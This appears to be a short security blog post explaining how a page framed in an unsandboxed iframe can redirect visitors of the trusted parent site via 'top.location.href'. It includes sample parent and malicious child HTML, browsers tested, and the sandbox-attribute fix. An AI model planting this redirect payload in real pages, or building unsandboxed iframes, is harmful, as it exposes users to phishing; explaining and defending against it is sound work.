Escaping an Unsandboxed Iframe

Escaping an Unsandboxed Iframe

James Gallagher's photo
James Gallagher
·

2 min read

In this post I show how a malicious redirect can be performed on a trusted website if the trusted site contains an unsandboxed iframe pointing to an untrusted site.

Consider this scenario:

  1. A website which the victim is likely to trust allows other sites to be presented as an iframe.

  2. An attacker creates a malicious site which is presented in the trusted site as an iframe.

  3. The victim navigates to the trusted site via a watering hole or social engineering attack.

  4. The victim is forcibly redirected to a phishing page due to an iframe escape.

Here is an example trusted parent website with an iframe:

<!DOCTYPE html>
<html>
<head>
    <title>Hello World Parent</title>
</head>
<body>
    <h1>Hello World</h1>
    <iframe src="http://10.0.0.2:8000/child.html"></iframe>
</body>
</html>

And here is an example malicious child website containing the iframe escape:

<!DOCTYPE html>
<html>
<head>
    <title>Child Site</title>
</head>
<body>
    <script>top.location.href = "https://example.com";</script>
</body>
</html>

We can see above that the trusted site presents an iframe pertaining to a site an attacker can control and the iframe is being escaped by the attacker with top.location.href. Although it’s unlikely the attacker will be able to run arbitrary JavaScript in the context of the parent site, a redirect is still possible.

I have tested this exploit on the browsers shown below and found it to work.

Windows:

-Edge 134.0.3124.51 64-bit (latest)

-Firefox 136.0 64-bit (latest)

-Chrome 134.0.6998.89 (latest)

Linux:

-Firefox 136.0 64-bit (latest)

-Chromium 134.0.6998.35 (latest)

-Brave 1.76.73 64-bit (latest)

On some targets containing an iframe with the redirect exploit, I have found Chromium-based browsers to show a warning that is minimized by default and only viewable if the user clicks an icon in the address bar. In those situations exploitation is infeasible except on Firefox.

This warning isn’t always presented and depends on the target, it seems.

The fix for this iframe escape is trivial. If the trusted website simply uses the sandbox attribute, then the redirect exploit will not be successful.

Here is an example trusted parent website using an iframe which is properly sandboxed:

<!DOCTYPE html>
<html>
<head>
    <title>Hello World Parent</title>
</head>
<body>
    <h1>Hello World</h1>
    <iframe sandbox src="http://127.0.0.1:8000/child.html"></iframe>
</body>
</html>

Did you find this article valuable?

Support James Gallagher by becoming a sponsor. Any amount is appreciated!

iframehacking